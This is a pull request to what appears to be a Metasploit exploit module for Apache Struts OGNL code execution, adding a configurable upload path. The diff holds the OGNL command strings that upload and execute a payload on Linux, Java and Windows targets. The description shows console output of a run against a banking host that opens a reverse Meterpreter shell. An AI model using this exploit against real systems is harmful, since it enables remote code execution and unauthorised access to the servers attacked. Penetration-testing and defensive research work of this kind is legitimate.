### PR TITLE
fix java payload struts module

### DIFF
--- a/modules/exploits/multi/http/struts_code_exec_parameters.rb
+++ b/modules/exploits/multi/http/struts_code_exec_parameters.rb
@@ -71,11 +71,20 @@ class Metasploit3 < Msf::Exploit::Remote
           OptString.new('TARGETURI', [ true, 'The path to a struts application action', '/blank-struts2/login.action']),
           OptInt.new('CHECK_SLEEPTIME', [ true, 'The time, in seconds, to ask the server to sleep while check', 5]),
           OptString.new('GET_PARAMETERS', [ false, 'Additional GET Parameters to send. Please supply in the format "param1=a&param2=b". Do apply URL encoding to the parameters names and values if needed.', nil]),
+          OptString.new('TMP_PATH', [ false, 'Overwrite the temp path for the file upload. Sometimes needed if the home directory is not writeable. Ensure there is a trailing slash!', nil])
     ], self.class)
   end
 
   def parameter
     datastore['PARAMETER']
+  end
+
+  def temp_path
+    return nil unless datastore['TMP_PATH']
+    unless datastore['TMP_PATH'].end_with?('/') || datastore['TMP_PATH'].end_with?('\\')
+      fail_with(Failure::BadConfig, 'You need to add a trailing slash/backslash to TMP_PATH')
+    end
+    datastore['TMP_PATH']
   end
 
   def get_parameter
@@ -115,11 +124,12 @@ class Metasploit3 < Msf::Exploit::Remote
     #Now arch specific...
     case target['Platform']
     when 'linux'
-      payload_exe = "/tmp/#{payload_exe}"
+      path = temp_path || '/tmp/'
+      payload_exe = "#{path}#{payload_exe}"
       chmod_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_chmod +x #{payload_exe}\".split(\"_\"))"
       exec_cmd = "@java.lang.Runtime@getRuntime().exec(\"/bin/sh_-c_#{payload_exe}\".split(\"_\"))"
     when 'java'
-      payload_exe << ".jar"
+      payload_exe = "#{temp_path}#{payload_exe}.jar"
       pl_exe = payload.encoded_jar.pack
       exec_cmd = ''
       exec_cmd << "#q=@java.lang.Class@forName('ognl.OgnlRuntime').getDeclaredField('_jdkChecked'),"
@@ -131,12 +141,14 @@ class Metasploit3 < Msf::Exploit::Remote
       exec_cmd << "#c.getMethod('main',new java.lang.Class[]{@java.lang.Class@forName('[Ljava.lang.String;')}).invoke("
       exec_cmd << "null,new java.lang.Object[]{new java.lang.String[0]})"
     when 'windows'
-      payload_exe = "./#{payload_exe}.exe"
+      path = temp_path || './'
+      payload_exe = "#{path}#{payload_exe}.exe"
       exec_cmd = "@java.lang.Runtime@getRuntime().exec('#{payload_exe}')"
     else
       fail_with(Failure::NoTarget, 'Unsupported target platform!')
     end
 
+    print_status("#{peer} - Uploading exploit to #{payload_exe}")
     #Now with all the arch specific stuff set, perform the upload.
     #109 = length of command string plus the max length of append.
     sub_from_chunk = 109 + payload_exe.length + datastore['TARGETURI'].length + parameter.length
@@ -148,6 +160,7 @@ class Metasploit3 < Msf::Exploit::Remote
       append = true
     end
     java_upload_part(pl_exe, payload_exe, append)
+    print_status("#{peer} - Executing payload")
     execute_command(chmod_cmd) if target['Platform'] == 'linux'
     execute_command(exec_cmd)
     register_files_for_cleanup(payload_exe)


### PR DESCRIPTION
This fixes the JAVA payload in the struts_code_exec_parameters exploit as discussed with @jvazquez-r7 in #3343 and on IRC.

This lets the user change the output path of the uploaded binary. In my example the path was not writeable and so the JAVA target did not work correctly.

Output:

```
$ msfcli exploit/test PARAMETER=username RHOST=ebanking.XXXX RPORT=80 TARGETURI=/login/Login.action TARGET=2 LHOST=10.201.0.70 TMP_PATH=/tmp/ E
[*] Initializing modules...
PARAMETER => username
RHOST => ebanking.XXXX
RPORT => 80
TARGETURI => /login/Login.action
TARGET => 2
LHOST => 10.201.0.70
TMP_PATH => /tmp/
[*] Started reverse handler on 10.201.0.70:4444 
[*] ebanking.XXXX:80 - Uploading exploit to /tmp/uiGUly.jar
[*] ebanking.XXXX:80 - Executing payload
[*] Sending stage (30355 bytes) to 192.168.200.234
[*] Meterpreter session 1 opened (10.201.0.70:4444 -> 192.168.200.234:58517) at 2014-05-09 22:17:18 +0000
[+] Deleted /tmp/uiGUly.jar

meterpreter > 
```
